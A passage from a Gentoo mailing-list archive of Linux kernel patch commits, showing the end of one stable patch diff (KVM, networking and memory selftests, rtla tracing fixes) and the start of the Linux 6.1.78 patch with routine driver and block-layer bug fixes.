++				ip_proto tcp tcp_flags 0x01/0x01 \
++				action drop &> /dev/null
++		else
++			tc filter del dev $h2 ingress pref $i proto ipv6 \
++				flower $tcflags dst_ip 2001:db8:1::1/128 \
++				action drop &> /dev/null
++		fi
++	done
++
++	log_test "max ACL group size test ($tcflags). max size $max_size"
++}
++
+ setup_prepare()
+ {
+ 	h1=${NETIFS[p1]}
+diff --git a/tools/testing/selftests/kvm/dirty_log_test.c b/tools/testing/selftests/kvm/dirty_log_test.c
+index b5234d6efbe15..ec40a33c29fda 100644
+--- a/tools/testing/selftests/kvm/dirty_log_test.c
++++ b/tools/testing/selftests/kvm/dirty_log_test.c
+@@ -226,13 +226,15 @@ static void clear_log_create_vm_done(struct kvm_vm *vm)
+ }
+ 
+ static void dirty_log_collect_dirty_pages(struct kvm_vcpu *vcpu, int slot,
+-					  void *bitmap, uint32_t num_pages)
++					  void *bitmap, uint32_t num_pages,
++					  uint32_t *unused)
+ {
+ 	kvm_vm_get_dirty_log(vcpu->vm, slot, bitmap);
+ }
+ 
+ static void clear_log_collect_dirty_pages(struct kvm_vcpu *vcpu, int slot,
+-					  void *bitmap, uint32_t num_pages)
++					  void *bitmap, uint32_t num_pages,
++					  uint32_t *unused)
+ {
+ 	kvm_vm_get_dirty_log(vcpu->vm, slot, bitmap);
+ 	kvm_vm_clear_dirty_log(vcpu->vm, slot, bitmap, 0, num_pages);
+@@ -329,10 +331,9 @@ static void dirty_ring_continue_vcpu(void)
+ }
+ 
+ static void dirty_ring_collect_dirty_pages(struct kvm_vcpu *vcpu, int slot,
+-					   void *bitmap, uint32_t num_pages)
++					   void *bitmap, uint32_t num_pages,
++					   uint32_t *ring_buf_idx)
+ {
+-	/* We only have one vcpu */
+-	static uint32_t fetch_index = 0;
+ 	uint32_t count = 0, cleared;
+ 	bool continued_vcpu = false;
+ 
+@@ -349,11 +350,15 @@ static void dirty_ring_collect_dirty_pages(struct kvm_vcpu *vcpu, int slot,
+ 
+ 	/* Only have one vcpu */
+ 	count = dirty_ring_collect_one(vcpu_map_dirty_ring(vcpu),
+-				       slot, bitmap, num_pages, &fetch_index);
++				       slot, bitmap, num_pages,
++				       ring_buf_idx);
+ 
+ 	cleared = kvm_vm_reset_dirty_ring(vcpu->vm);
+ 
+-	/* Cleared pages should be the same as collected */
++	/*
++	 * Cleared pages should be the same as collected, as KVM is supposed to
++	 * clear only the entries that have been harvested.
++	 */
+ 	TEST_ASSERT(cleared == count, "Reset dirty pages (%u) mismatch "
+ 		    "with collected (%u)", cleared, count);
+ 
+@@ -392,12 +397,6 @@ static void dirty_ring_after_vcpu_run(struct kvm_vcpu *vcpu, int ret, int err)
+ 	}
+ }
+ 
+-static void dirty_ring_before_vcpu_join(void)
+-{
+-	/* Kick another round of vcpu just to make sure it will quit */
+-	sem_post(&sem_vcpu_cont);
+-}
+-
+ struct log_mode {
+ 	const char *name;
+ 	/* Return true if this mode is supported, otherwise false */
+@@ -406,10 +405,10 @@ struct log_mode {
+ 	void (*create_vm_done)(struct kvm_vm *vm);
+ 	/* Hook to collect the dirty pages into the bitmap provided */
+ 	void (*collect_dirty_pages) (struct kvm_vcpu *vcpu, int slot,
+-				     void *bitmap, uint32_t num_pages);
++				     void *bitmap, uint32_t num_pages,
++				     uint32_t *ring_buf_idx);
+ 	/* Hook to call when after each vcpu run */
+ 	void (*after_vcpu_run)(struct kvm_vcpu *vcpu, int ret, int err);
+-	void (*before_vcpu_join) (void);
+ } log_modes[LOG_MODE_NUM] = {
+ 	{
+ 		.name = "dirty-log",
+@@ -428,7 +427,6 @@ struct log_mode {
+ 		.supported = dirty_ring_supported,
+ 		.create_vm_done = dirty_ring_create_vm_done,
+ 		.collect_dirty_pages = dirty_ring_collect_dirty_pages,
+-		.before_vcpu_join = dirty_ring_before_vcpu_join,
+ 		.after_vcpu_run = dirty_ring_after_vcpu_run,
+ 	},
+ };
+@@ -471,13 +469,14 @@ static void log_mode_create_vm_done(struct kvm_vm *vm)
+ }
+ 
+ static void log_mode_collect_dirty_pages(struct kvm_vcpu *vcpu, int slot,
+-					 void *bitmap, uint32_t num_pages)
++					 void *bitmap, uint32_t num_pages,
++					 uint32_t *ring_buf_idx)
+ {
+ 	struct log_mode *mode = &log_modes[host_log_mode];
+ 
+ 	TEST_ASSERT(mode->collect_dirty_pages != NULL,
+ 		    "collect_dirty_pages() is required for any log mode!");
+-	mode->collect_dirty_pages(vcpu, slot, bitmap, num_pages);
++	mode->collect_dirty_pages(vcpu, slot, bitmap, num_pages, ring_buf_idx);
+ }
+ 
+ static void log_mode_after_vcpu_run(struct kvm_vcpu *vcpu, int ret, int err)
+@@ -488,14 +487,6 @@ static void log_mode_after_vcpu_run(struct kvm_vcpu *vcpu, int ret, int err)
+ 		mode->after_vcpu_run(vcpu, ret, err);
+ }
+ 
+-static void log_mode_before_vcpu_join(void)
+-{
+-	struct log_mode *mode = &log_modes[host_log_mode];
+-
+-	if (mode->before_vcpu_join)
+-		mode->before_vcpu_join();
+-}
+-
+ static void generate_random_array(uint64_t *guest_array, uint64_t size)
+ {
+ 	uint64_t i;
+@@ -696,6 +687,8 @@ static void run_test(enum vm_guest_mode mode, void *arg)
+ 	struct kvm_vcpu *vcpu;
+ 	struct kvm_vm *vm;
+ 	unsigned long *bmap;
++	uint32_t ring_buf_idx = 0;
++	int sem_val;
+ 
+ 	if (!log_mode_supported()) {
+ 		print_skip("Log mode '%s' not supported",
+@@ -767,10 +760,21 @@ static void run_test(enum vm_guest_mode mode, void *arg)
+ 	/* Start the iterations */
+ 	iteration = 1;
+ 	sync_global_to_guest(vm, iteration);
+-	host_quit = false;
++	WRITE_ONCE(host_quit, false);
+ 	host_dirty_count = 0;
+ 	host_clear_count = 0;
+ 	host_track_next_count = 0;
++	WRITE_ONCE(dirty_ring_vcpu_ring_full, false);
++
++	/*
++	 * Ensure the previous iteration didn't leave a dangling semaphore, i.e.
++	 * that the main task and vCPU worker were synchronized and completed
++	 * verification of all iterations.
++	 */
++	sem_getvalue(&sem_vcpu_stop, &sem_val);
++	TEST_ASSERT_EQ(sem_val, 0);
++	sem_getvalue(&sem_vcpu_cont, &sem_val);
++	TEST_ASSERT_EQ(sem_val, 0);
+ 
+ 	pthread_create(&vcpu_thread, NULL, vcpu_worker, vcpu);
+ 
+@@ -778,7 +782,8 @@ static void run_test(enum vm_guest_mode mode, void *arg)
+ 		/* Give the vcpu thread some time to dirty some pages */
+ 		usleep(p->interval * 1000);
+ 		log_mode_collect_dirty_pages(vcpu, TEST_MEM_SLOT_INDEX,
+-					     bmap, host_num_pages);
++					     bmap, host_num_pages,
++					     &ring_buf_idx);
+ 
+ 		/*
+ 		 * See vcpu_sync_stop_requested definition for details on why
+@@ -796,15 +801,21 @@ static void run_test(enum vm_guest_mode mode, void *arg)
+ 		assert(host_log_mode == LOG_MODE_DIRTY_RING ||
+ 		       atomic_read(&vcpu_sync_stop_requested) == false);
+ 		vm_dirty_log_verify(mode, bmap);
+-		sem_post(&sem_vcpu_cont);
+ 
+-		iteration++;
++		/*
++		 * Set host_quit before sem_vcpu_cont in the final iteration to
++		 * ensure that the vCPU worker doesn't resume the guest.  As
++		 * above, the dirty ring test may stop and wait even when not
++		 * explicitly requested to do so, i.e. would hang waiting for a
++		 * "continue" if it's allowed to resume the guest.
++		 */
++		if (++iteration == p->iterations)
++			WRITE_ONCE(host_quit, true);
++
++		sem_post(&sem_vcpu_cont);
+ 		sync_global_to_guest(vm, iteration);
+ 	}
+ 
+-	/* Tell the vcpu thread to quit */
+-	host_quit = true;
+-	log_mode_before_vcpu_join();
+ 	pthread_join(vcpu_thread, NULL);
+ 
+ 	pr_info("Total bits checked: dirty (%"PRIu64"), clear (%"PRIu64"), "
+diff --git a/tools/testing/selftests/net/mptcp/config b/tools/testing/selftests/net/mptcp/config
+index e317c2e44dae8..4f80014cae494 100644
+--- a/tools/testing/selftests/net/mptcp/config
++++ b/tools/testing/selftests/net/mptcp/config
+@@ -22,8 +22,11 @@ CONFIG_NFT_TPROXY=m
+ CONFIG_NFT_SOCKET=m
+ CONFIG_IP_ADVANCED_ROUTER=y
+ CONFIG_IP_MULTIPLE_TABLES=y
++CONFIG_IP_NF_FILTER=m
++CONFIG_IP_NF_MANGLE=m
+ CONFIG_IP_NF_TARGET_REJECT=m
+ CONFIG_IPV6_MULTIPLE_TABLES=y
++CONFIG_IP6_NF_FILTER=m
+ CONFIG_NET_ACT_CSUM=m
+ CONFIG_NET_ACT_PEDIT=m
+ CONFIG_NET_CLS_ACT=y
+diff --git a/tools/testing/selftests/net/mptcp/settings b/tools/testing/selftests/net/mptcp/settings
+index 79b65bdf05db6..abc5648b59abd 100644
+--- a/tools/testing/selftests/net/mptcp/settings
++++ b/tools/testing/selftests/net/mptcp/settings
+@@ -1 +1 @@
+-timeout=1200
++timeout=1800
+diff --git a/tools/testing/selftests/vm/ksm_tests.c b/tools/testing/selftests/vm/ksm_tests.c
+index 0d85be2350fa3..a811659307855 100644
+--- a/tools/testing/selftests/vm/ksm_tests.c
++++ b/tools/testing/selftests/vm/ksm_tests.c
+@@ -470,7 +470,7 @@ static int ksm_merge_hugepages_time(int mapping, int prot, int timeout, size_t m
+ 	if (map_ptr_orig == MAP_FAILED)
+ 		err(2, "initial mmap");
+ 
+-	if (madvise(map_ptr, len + HPAGE_SIZE, MADV_HUGEPAGE))
++	if (madvise(map_ptr, len, MADV_HUGEPAGE))
+ 		err(2, "MADV_HUGEPAGE");
+ 
+ 	pagemap_fd = open("/proc/self/pagemap", O_RDONLY);
+diff --git a/tools/testing/selftests/vm/va_128TBswitch.sh b/tools/testing/selftests/vm/va_128TBswitch.sh
+index 41580751dc511..231622b3a2327 100755
+--- a/tools/testing/selftests/vm/va_128TBswitch.sh
++++ b/tools/testing/selftests/vm/va_128TBswitch.sh
+@@ -29,9 +29,15 @@ check_supported_x86_64()
+ 	# See man 1 gzip under '-f'.
+ 	local pg_table_levels=$(gzip -dcfq "${config}" | grep PGTABLE_LEVELS | cut -d'=' -f 2)
+ 
++	local cpu_supports_pl5=$(awk '/^flags/ {if (/la57/) {print 0;}
++		else {print 1}; exit}' /proc/cpuinfo 2>/dev/null)
++
+ 	if [[ "${pg_table_levels}" -lt 5 ]]; then
+ 		echo "$0: PGTABLE_LEVELS=${pg_table_levels}, must be >= 5 to run this test"
+ 		exit $ksft_skip
++	elif [[ "${cpu_supports_pl5}" -ne 0 ]]; then
++		echo "$0: CPU does not have the necessary la57 flag to support page table level 5"
++		exit $ksft_skip
+ 	fi
+ }
+ 
+diff --git a/tools/tracing/rtla/Makefile b/tools/tracing/rtla/Makefile
+index 22e28b76f8004..6912e9577b658 100644
+--- a/tools/tracing/rtla/Makefile
++++ b/tools/tracing/rtla/Makefile
+@@ -28,10 +28,15 @@ FOPTS	:=	-flto=auto -ffat-lto-objects -fexceptions -fstack-protector-strong \
+ 		-fasynchronous-unwind-tables -fstack-clash-protection
+ WOPTS	:= 	-Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -Wno-maybe-uninitialized
+ 
++ifeq ($(CC),clang)
++  FOPTS := $(filter-out -ffat-lto-objects, $(FOPTS))
++  WOPTS := $(filter-out -Wno-maybe-uninitialized, $(WOPTS))
++endif
++
+ TRACEFS_HEADERS	:= $$($(PKG_CONFIG) --cflags libtracefs)
+ 
+ CFLAGS	:=	-O -g -DVERSION=\"$(VERSION)\" $(FOPTS) $(MOPTS) $(WOPTS) $(TRACEFS_HEADERS) $(EXTRA_CFLAGS)
+-LDFLAGS	:=	-ggdb $(EXTRA_LDFLAGS)
++LDFLAGS	:=	-flto=auto -ggdb $(EXTRA_LDFLAGS)
+ LIBS	:=	$$($(PKG_CONFIG) --libs libtracefs)
+ 
+ SRC	:=	$(wildcard src/*.c)
+diff --git a/tools/tracing/rtla/src/osnoise_hist.c b/tools/tracing/rtla/src/osnoise_hist.c
+index fe34452fc4ec0..b9658f213cb55 100644
+--- a/tools/tracing/rtla/src/osnoise_hist.c
++++ b/tools/tracing/rtla/src/osnoise_hist.c
+@@ -129,8 +129,7 @@ static void osnoise_hist_update_multiple(struct osnoise_tool *tool, int cpu,
+ 	if (params->output_divisor)
+ 		duration = duration / params->output_divisor;
+ 
+-	if (data->bucket_size)
+-		bucket = duration / data->bucket_size;
++	bucket = duration / data->bucket_size;
+ 
+ 	total_duration = duration * count;
+ 
+@@ -472,7 +471,11 @@ static void osnoise_hist_usage(char *usage)
+ 
+ 	for (i = 0; msg[i]; i++)
+ 		fprintf(stderr, "%s\n", msg[i]);
+-	exit(1);
++
++	if (usage)
++		exit(EXIT_FAILURE);
++
++	exit(EXIT_SUCCESS);
+ }
+ 
+ /*
+diff --git a/tools/tracing/rtla/src/osnoise_top.c b/tools/tracing/rtla/src/osnoise_top.c
+index 76479bfb29224..6c07f360de72c 100644
+--- a/tools/tracing/rtla/src/osnoise_top.c
++++ b/tools/tracing/rtla/src/osnoise_top.c
+@@ -282,7 +282,11 @@ void osnoise_top_usage(char *usage)
+ 
+ 	for (i = 0; msg[i]; i++)
+ 		fprintf(stderr, "%s\n", msg[i]);
+-	exit(1);
++
++	if (usage)
++		exit(EXIT_FAILURE);
++
++	exit(EXIT_SUCCESS);
+ }
+ 
+ /*
+diff --git a/tools/tracing/rtla/src/timerlat_hist.c b/tools/tracing/rtla/src/timerlat_hist.c
+index 4b48af8a83096..ed08295bfa12c 100644
+--- a/tools/tracing/rtla/src/timerlat_hist.c
++++ b/tools/tracing/rtla/src/timerlat_hist.c
+@@ -151,8 +151,7 @@ timerlat_hist_update(struct osnoise_tool *tool, int cpu,
+ 	if (params->output_divisor)
+ 		latency = latency / params->output_divisor;
+ 
+-	if (data->bucket_size)
+-		bucket = latency / data->bucket_size;
++	bucket = latency / data->bucket_size;
+ 
+ 	if (!thread) {
+ 		hist = data->hist[cpu].irq;
+@@ -475,7 +474,11 @@ static void timerlat_hist_usage(char *usage)
+ 
+ 	for (i = 0; msg[i]; i++)
+ 		fprintf(stderr, "%s\n", msg[i]);
+-	exit(1);
++
++	if (usage)
++		exit(EXIT_FAILURE);
++
++	exit(EXIT_SUCCESS);
+ }
+ 
+ /*
+diff --git a/tools/tracing/rtla/src/timerlat_top.c b/tools/tracing/rtla/src/timerlat_top.c
+index 3342719352222..8fc0f6aa19dad 100644
+--- a/tools/tracing/rtla/src/timerlat_top.c
++++ b/tools/tracing/rtla/src/timerlat_top.c
+@@ -305,7 +305,11 @@ static void timerlat_top_usage(char *usage)
+ 
+ 	for (i = 0; msg[i]; i++)
+ 		fprintf(stderr, "%s\n", msg[i]);
+-	exit(1);
++
++	if (usage)
++		exit(EXIT_FAILURE);
++
++	exit(EXIT_SUCCESS);
+ }
+ 
+ /*
+diff --git a/tools/tracing/rtla/src/utils.c b/tools/tracing/rtla/src/utils.c
+index 663a047f794d2..8c8d63c7196cf 100644
+--- a/tools/tracing/rtla/src/utils.c
++++ b/tools/tracing/rtla/src/utils.c
+@@ -243,12 +243,6 @@ static inline int sched_setattr(pid_t pid, const struct sched_attr *attr,
+ 	return syscall(__NR_sched_setattr, pid, attr, flags);
+ }
+ 
+-static inline int sched_getattr(pid_t pid, struct sched_attr *attr,
+-				unsigned int size, unsigned int flags)
+-{
+-	return syscall(__NR_sched_getattr, pid, attr, size, flags);
+-}
+-
+ int __set_sched_attr(int pid, struct sched_attr *attr)
+ {
+ 	int flags = 0;
+@@ -484,13 +478,13 @@ int parse_prio(char *arg, struct sched_attr *sched_param)
+ 		if (prio == INVALID_VAL)
+ 			return -1;
+ 
+-		if (prio < sched_get_priority_min(SCHED_OTHER))
++		if (prio < MIN_NICE)
+ 			return -1;
+-		if (prio > sched_get_priority_max(SCHED_OTHER))
++		if (prio > MAX_NICE)
+ 			return -1;
+ 
+ 		sched_param->sched_policy   = SCHED_OTHER;
+-		sched_param->sched_priority = prio;
++		sched_param->sched_nice = prio;
+ 		break;
+ 	default:
+ 		return -1;
+diff --git a/tools/tracing/rtla/src/utils.h b/tools/tracing/rtla/src/utils.h
+index 5571afd3b5498..92da41aaf4c4c 100644
+--- a/tools/tracing/rtla/src/utils.h
++++ b/tools/tracing/rtla/src/utils.h
+@@ -7,6 +7,8 @@
+  */
+ #define BUFF_U64_STR_SIZE	24
+ #define MAX_PATH		1024
++#define MAX_NICE		20
++#define MIN_NICE		-19
+ 
+ #define container_of(ptr, type, member)({			\
+ 	const typeof(((type *)0)->member) *__mptr = (ptr);	\


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-02-16 19:00 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-02-16 19:00 UTC (permalink / raw
  To: gentoo-commits

commit:     09ae4eccbe9b346bb7300a09df69bfb5495388e5
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Feb 16 19:00:20 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Feb 16 19:00:20 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=09ae4ecc

Linux patch 6.1.78

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1077_linux-6.1.78.patch | 2252 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2256 insertions(+)

diff --git a/0000_README b/0000_README
index 264766b5..7d732a84 100644
--- a/0000_README
+++ b/0000_README
@@ -351,6 +351,10 @@ Patch:  1076_linux-6.1.77.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.77
 
+Patch:  1077_linux-6.1.78.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.78
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1077_linux-6.1.78.patch b/1077_linux-6.1.78.patch
new file mode 100644
index 00000000..d0f0c097
--- /dev/null
+++ b/1077_linux-6.1.78.patch
@@ -0,0 +1,2252 @@
+diff --git a/Makefile b/Makefile
+index f5598d90093f5..e93554269e474 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 77
++SUBLEVEL = 78
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/block/blk-core.c b/block/blk-core.c
+index 6eaf2b0ad7cca..aefdf07bdc2cf 100644
+--- a/block/blk-core.c
++++ b/block/blk-core.c
+@@ -864,7 +864,16 @@ int bio_poll(struct bio *bio, struct io_comp_batch *iob, unsigned int flags)
+ 	 */
+ 	blk_flush_plug(current->plug, false);
+ 
+-	if (bio_queue_enter(bio))
++	/*
++	 * We need to be able to enter a frozen queue, similar to how
++	 * timeouts also need to do that. If that is blocked, then we can
++	 * have pending IO when a queue freeze is started, and then the
++	 * wait for the freeze to finish will wait for polled requests to
++	 * time out as the poller is prevented from entering the queue and
++	 * completing them. As long as we prevent new IO from being queued,
++	 * that should be all that matters.
++	 */
++	if (!percpu_ref_tryget(&q->q_usage_counter))
+ 		return 0;
+ 	if (queue_is_mq(q)) {
+ 		ret = blk_mq_poll(q, cookie, iob, flags);
+diff --git a/block/blk-iocost.c b/block/blk-iocost.c
+index 7dd6a33e1d6a8..e6557024e3da8 100644
+--- a/block/blk-iocost.c
++++ b/block/blk-iocost.c
+@@ -1337,6 +1337,13 @@ static bool iocg_kick_delay(struct ioc_gq *iocg, struct ioc_now *now)
+ 
+ 	lockdep_assert_held(&iocg->waitq.lock);
+ 
++	/*
++	 * If the delay is set by another CPU, we may be in the past. No need to
++	 * change anything if so. This avoids decay calculation underflow.
++	 */
++	if (time_before64(now->now, iocg->delay_at))
++		return false;
++
+ 	/* calculate the current delay in effect - 1/2 every second */
+ 	tdelta = now->now - iocg->delay_at;
+ 	if (iocg->delay)
+diff --git a/drivers/atm/idt77252.c b/drivers/atm/idt77252.c
+index 49cb4537344aa..2daf50d4cd47a 100644
+--- a/drivers/atm/idt77252.c
++++ b/drivers/atm/idt77252.c
+@@ -2930,6 +2930,8 @@ open_card_ubr0(struct idt77252_dev *card)
+ 	vc->scq = alloc_scq(card, vc->class);
+ 	if (!vc->scq) {
+ 		printk("%s: can't get SCQ.\n", card->name);
++		kfree(card->vcs[0]);
++		card->vcs[0] = NULL;
+ 		return -ENOMEM;
+ 	}
+ 
+diff --git a/drivers/dma/fsl-dpaa2-qdma/dpaa2-qdma.c b/drivers/dma/fsl-dpaa2-qdma/dpaa2-qdma.c
+index 8dd40d00a672a..6b829d347417a 100644
+--- a/drivers/dma/fsl-dpaa2-qdma/dpaa2-qdma.c
++++ b/drivers/dma/fsl-dpaa2-qdma/dpaa2-qdma.c
+@@ -38,15 +38,17 @@ static int dpaa2_qdma_alloc_chan_resources(struct dma_chan *chan)
+ 	if (!dpaa2_chan->fd_pool)
+ 		goto err;
+ 
+-	dpaa2_chan->fl_pool = dma_pool_create("fl_pool", dev,
+-					      sizeof(struct dpaa2_fl_entry),
+-					      sizeof(struct dpaa2_fl_entry), 0);
++	dpaa2_chan->fl_pool =
++		dma_pool_create("fl_pool", dev,
++				 sizeof(struct dpaa2_fl_entry) * 3,
++				 sizeof(struct dpaa2_fl_entry), 0);
++
+ 	if (!dpaa2_chan->fl_pool)
+ 		goto err_fd;
+ 
+ 	dpaa2_chan->sdd_pool =
+ 		dma_pool_create("sdd_pool", dev,
+-				sizeof(struct dpaa2_qdma_sd_d),
++				sizeof(struct dpaa2_qdma_sd_d) * 2,
+ 				sizeof(struct dpaa2_qdma_sd_d), 0);
+ 	if (!dpaa2_chan->sdd_pool)
+ 		goto err_fl;
+diff --git a/drivers/dma/fsl-qdma.c b/drivers/dma/fsl-qdma.c
+index 045ead46ec8fc..69385f32e2756 100644
+--- a/drivers/dma/fsl-qdma.c
++++ b/drivers/dma/fsl-qdma.c
+@@ -514,11 +514,11 @@ static struct fsl_qdma_queue
+ 			queue_temp = queue_head + i + (j * queue_num);
+ 
+ 			queue_temp->cq =
+-			dma_alloc_coherent(&pdev->dev,
+-					   sizeof(struct fsl_qdma_format) *
+-					   queue_size[i],
+-					   &queue_temp->bus_addr,
+-					   GFP_KERNEL);
++			dmam_alloc_coherent(&pdev->dev,
++					    sizeof(struct fsl_qdma_format) *
++					    queue_size[i],
++					    &queue_temp->bus_addr,
++					    GFP_KERNEL);
+ 			if (!queue_temp->cq)
+ 				return NULL;
+ 			queue_temp->block_base = fsl_qdma->block_base +
+@@ -563,11 +563,11 @@ static struct fsl_qdma_queue
+ 	/*
+ 	 * Buffer for queue command
+ 	 */
+-	status_head->cq = dma_alloc_coherent(&pdev->dev,
+-					     sizeof(struct fsl_qdma_format) *
+-					     status_size,
+-					     &status_head->bus_addr,
+-					     GFP_KERNEL);
++	status_head->cq = dmam_alloc_coherent(&pdev->dev,
++					      sizeof(struct fsl_qdma_format) *
++					      status_size,
++					      &status_head->bus_addr,
++					      GFP_KERNEL);
+ 	if (!status_head->cq) {
+ 		devm_kfree(&pdev->dev, status_head);
+ 		return NULL;
+@@ -1272,8 +1272,6 @@ static void fsl_qdma_cleanup_vchan(struct dma_device *dmadev)
+ 
+ static int fsl_qdma_remove(struct platform_device *pdev)
+ {
+-	int i;
+-	struct fsl_qdma_queue *status;
+ 	struct device_node *np = pdev->dev.of_node;
+ 	struct fsl_qdma_engine *fsl_qdma = platform_get_drvdata(pdev);
+ 
+@@ -1282,11 +1280,6 @@ static int fsl_qdma_remove(struct platform_device *pdev)
+ 	of_dma_controller_free(np);
+ 	dma_async_device_unregister(&fsl_qdma->dma_dev);
+ 
+-	for (i = 0; i < fsl_qdma->block_number; i++) {
+-		status = fsl_qdma->status[i];
+-		dma_free_coherent(&pdev->dev, sizeof(struct fsl_qdma_format) *
+-				status->n_cq, status->cq, status->bus_addr);
+-	}
+ 	return 0;
+ }
+ 
+diff --git a/drivers/dma/ti/k3-udma.c b/drivers/dma/ti/k3-udma.c
+index b86b809eb1f7e..82e7acfda6ed0 100644
+--- a/drivers/dma/ti/k3-udma.c
++++ b/drivers/dma/ti/k3-udma.c
+@@ -3963,6 +3963,7 @@ static void udma_desc_pre_callback(struct virt_dma_chan *vc,
+ {
+ 	struct udma_chan *uc = to_udma_chan(&vc->chan);
+ 	struct udma_desc *d;
++	u8 status;
+ 
+ 	if (!vd)
+ 		return;
+@@ -3972,12 +3973,12 @@ static void udma_desc_pre_callback(struct virt_dma_chan *vc,
+ 	if (d->metadata_size)
+ 		udma_fetch_epib(uc, d);
+ 
+-	/* Provide residue information for the client */
+ 	if (result) {
+ 		void *desc_vaddr = udma_curr_cppi5_desc_vaddr(d, d->desc_idx);
+ 
+ 		if (cppi5_desc_get_type(desc_vaddr) ==
+ 		    CPPI5_INFO0_DESC_TYPE_VAL_HOST) {
++			/* Provide residue information for the client */
+ 			result->residue = d->residue -
+ 					  cppi5_hdesc_get_pktlen(desc_vaddr);
+ 			if (result->residue)
+@@ -3986,7 +3987,12 @@ static void udma_desc_pre_callback(struct virt_dma_chan *vc,
+ 				result->result = DMA_TRANS_NOERROR;
+ 		} else {
+ 			result->residue = 0;
+-			result->result = DMA_TRANS_NOERROR;
++			/* Propagate TR Response errors to the client */
++			status = d->hwdesc[0].tr_resp_base->status;
++			if (status)
++				result->result = DMA_TRANS_ABORTED;
++			else
++				result->result = DMA_TRANS_NOERROR;
+ 		}
+ 	}
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn301/dcn301_resource.c b/drivers/gpu/drm/amd/display/dc/dcn301/dcn301_resource.c
+index f04595b750abc..5ec3f50a72acd 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn301/dcn301_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn301/dcn301_resource.c
+@@ -1014,7 +1014,7 @@ static struct stream_encoder *dcn301_stream_encoder_create(enum engine_id eng_id
+ 	vpg = dcn301_vpg_create(ctx, vpg_inst);
+ 	afmt = dcn301_afmt_create(ctx, afmt_inst);
+ 
+-	if (!enc1 || !vpg || !afmt) {
++	if (!enc1 || !vpg || !afmt || eng_id >= ARRAY_SIZE(stream_enc_regs)) {
+ 		kfree(enc1);
+ 		kfree(vpg);
+ 		kfree(afmt);
+diff --git a/drivers/gpu/drm/i915/gvt/handlers.c b/drivers/gpu/drm/i915/gvt/handlers.c
+index daac2050d77d0..6f531bb61f7e5 100644
+--- a/drivers/gpu/drm/i915/gvt/handlers.c
++++ b/drivers/gpu/drm/i915/gvt/handlers.c
+@@ -2844,8 +2844,7 @@ static int handle_mmio(struct intel_gvt_mmio_table_iter *iter, u32 offset,
+ 	for (i = start; i < end; i += 4) {
+ 		p = intel_gvt_find_mmio_info(gvt, i);
+ 		if (p) {
+-			WARN(1, "dup mmio definition offset %x\n",
+-				info->offset);
++			WARN(1, "dup mmio definition offset %x\n", i);
+ 
+ 			/* We return -EEXIST here to make GVT-g load fail.
+ 			 * So duplicated MMIO can be found as soon as
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+index 38d38f923df64..25245ef386db6 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+@@ -2053,7 +2053,7 @@ void dpu_encoder_helper_phys_cleanup(struct dpu_encoder_phys *phys_enc)
+ 	}
+ 
+ 	/* reset the merge 3D HW block */
+-	if (phys_enc->hw_pp->merge_3d) {
++	if (phys_enc->hw_pp && phys_enc->hw_pp->merge_3d) {
+ 		phys_enc->hw_pp->merge_3d->ops.setup_3d_mode(phys_enc->hw_pp->merge_3d,
+ 				BLEND_3D_NONE);
+ 		if (phys_enc->hw_ctl->ops.update_pending_flush_merge_3d)
+@@ -2069,7 +2069,7 @@ void dpu_encoder_helper_phys_cleanup(struct dpu_encoder_phys *phys_enc)
+ 	if (phys_enc->hw_wb)
+ 		intf_cfg.wb = phys_enc->hw_wb->idx;
+ 
+-	if (phys_enc->hw_pp->merge_3d)
++	if (phys_enc->hw_pp && phys_enc->hw_pp->merge_3d)
+ 		intf_cfg.merge_3d = phys_enc->hw_pp->merge_3d->idx;
+ 
+ 	if (ctl->ops.reset_intf_cfg)
+diff --git a/drivers/gpu/drm/msm/dp/dp_ctrl.c b/drivers/gpu/drm/msm/dp/dp_ctrl.c
+index 103eef9f059a0..b20701893e5b3 100644
+--- a/drivers/gpu/drm/msm/dp/dp_ctrl.c
++++ b/drivers/gpu/drm/msm/dp/dp_ctrl.c
+@@ -133,11 +133,6 @@ static void dp_ctrl_config_ctrl(struct dp_ctrl_private *ctrl)
+ 	tbd = dp_link_get_test_bits_depth(ctrl->link,
+ 			ctrl->panel->dp_mode.bpp);
+ 
+-	if (tbd == DP_TEST_BIT_DEPTH_UNKNOWN) {
+-		pr_debug("BIT_DEPTH not set. Configure default\n");
+-		tbd = DP_TEST_BIT_DEPTH_8;
+-	}
+-
+ 	config |= tbd << DP_CONFIGURATION_CTRL_BPC_SHIFT;
+ 
+ 	/* Num of Lanes */
+diff --git a/drivers/gpu/drm/msm/dp/dp_link.c b/drivers/gpu/drm/msm/dp/dp_link.c
+index cb66d1126ea96..ceb382fa56d5b 100644
+--- a/drivers/gpu/drm/msm/dp/dp_link.c
++++ b/drivers/gpu/drm/msm/dp/dp_link.c
+@@ -7,6 +7,7 @@
+ 
+ #include <drm/drm_print.h>
+ 
++#include "dp_reg.h"
+ #include "dp_link.h"
+ #include "dp_panel.h"
+ 
+@@ -1075,7 +1076,7 @@ int dp_link_process_request(struct dp_link *dp_link)
